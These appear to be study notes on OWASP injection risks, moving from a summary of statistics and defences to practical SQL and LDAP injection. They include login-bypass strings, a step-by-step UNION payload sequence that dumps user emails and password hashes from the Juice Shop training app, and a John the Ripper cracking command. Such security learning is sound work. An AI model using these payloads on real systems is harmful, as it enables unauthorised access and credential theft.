
1. **Injection Attacks Remain a Significant Security Risk**:
    - Injection is ranked #3 in the OWASP Top 10 2021, indicating it is still a major concern for web applications.
    - While not as prevalent as some other risks, injection vulnerabilities are still found in over 50% of applications tested.
2. **Understanding Injection Attacks**:
    - Injection attacks allow attackers to relay malicious code through an application to another system, such as the operating system, database, or external programs.
    - The most common type of injection is SQL injection, but other forms like LDAP injection also exist.
3. **Factors Contributing to Injection Risks**:
    - 33 CWEs (Common Weakness Enumerations) were mapped to injection vulnerabilities.
    - Injection attacks have a high average weighted exploit score (7.25/10) and impact score (7.15/10), indicating they are relatively easy to exploit and can have severe consequences.
4. **Injection Attack Mechanics**:
    - Injection attacks occur when user-supplied input is not properly validated or sanitized before being used in a command or query by the application.
    - Attackers can craft malicious input to manipulate the intended command or query, leading to unauthorized access, data exposure, or other malicious outcomes.
5. **Protecting Against Injection Attacks**:
    - Avoid accessing external interpreters whenever possible, and use safe APIs that provide built-in protections.
    - Validate and sanitize all user input to ensure it does not contain malicious content.
    - Structure requests to treat user-supplied parameters as data, not executable content.
    - Limit the privileges of the application to the minimum required to perform its function.
    - Escape special characters and use SQL controls to prevent mass disclosure of records.
6. **Resources for Guidance**:
    - The OWASP Application Security Verification Standard (ASVS) and other OWASP resources provide detailed guidance on preventing injection vulnerabilities.

>[!info] Summary
>The key message is that while injection attacks are not as prevalent as they once were, they remain a significant security risk that requires careful attention to input validation, secure coding practices, and the use of appropriate safeguards to protect against malicious exploitation.

---

##### SQL Injection:

txtSQL = ‘SELECT * FROM Users WHERE Username = “ ’ + txtUsername’ ”AND Password=” ’+txtPassword+’ ” ’

_Injection:_ John” OR 1=1’

txtSQL = **‘**SELECT * FROM Users WHERE Username = “John” OR 1=1’** _“AND Password= ”” ’_
asdhhs' or 1=1--
Password part is ignored

URLs:

- [https://portswigger.net/web-security/sql-injection](https://portswigger.net/web-security/sql-injection)
    
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
    

> Login form: login with the first entry of the Users table

' or 1=1--

> Login form: login with any user:

bender@juice-sh.op'--

---

> Search functionality:

test')) UNION SELECT id,username,email,password,role,6,7,8,9 FROM USERS--

URL encoded version (*Ctrl+U in BurpSuite*):

/rest/products/search?q=test'))+UNION+SELECT+id,username,email,password,role,6,7,8,9+FROM+USERS--

> Example of how you could get to this result (each line is a payload to test/try, in order):

'

'--

'))

'))--

')) UNION SELECT * FROM sqlite_schema-- (info here: [](https://www.sqlite.org/schematab.html)[https://www.sqlite.org/schematab.html](https://www.sqlite.org/schematab.html)))

test')) UNION SELECT * FROM sqlite_schema--

test')) UNION SELECT 1 FROM sqlite_schema--

test')) UNION SELECT 1,2 FROM sqlite_schema--

(repeat until you match the amount of columns the original table (Products) has)

test')) UNION SELECT 1,2,3,4,5,6,7,8,9 FROM sqlite_schema--

test')) UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_schema--

test')) UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_schema--

test')) UNION SELECT id,username,email,password,role,6,7,8,9 FROM Users--

> You can then extract the emails + hashes passwords of the users and crack with John The Ripper or Hashcat:

$ cat password.hash

admin@juice-sh.op:0192023a7bbd73250516f069df18b500

$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 password.hash

##### LDAP (Lightweight Directory Access Protocol)

**find("(&(cn=John)(userPassword=mypass))")**
http:\//www.example.com/ldapsearch?user=John
--> **searchfilter="(cn="+user+")"**
--> **searchlogin = "(&(uid="+user+")userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))"**

*Injection:* \*)(uid=\*))( |(uid=\*
password: password

searchlogin = "(**&(uid=\*)(uid=\*)**)( **|**(uid=\*)*(userPassword={MD5}X03MO1qnZdgyfeuILPmQ\==))*;
1st statement: (uid=\*) AND (uid=\*) == True
2nd statement: ( **(uid=\*)** OR (userPassword= ...)) == True

---
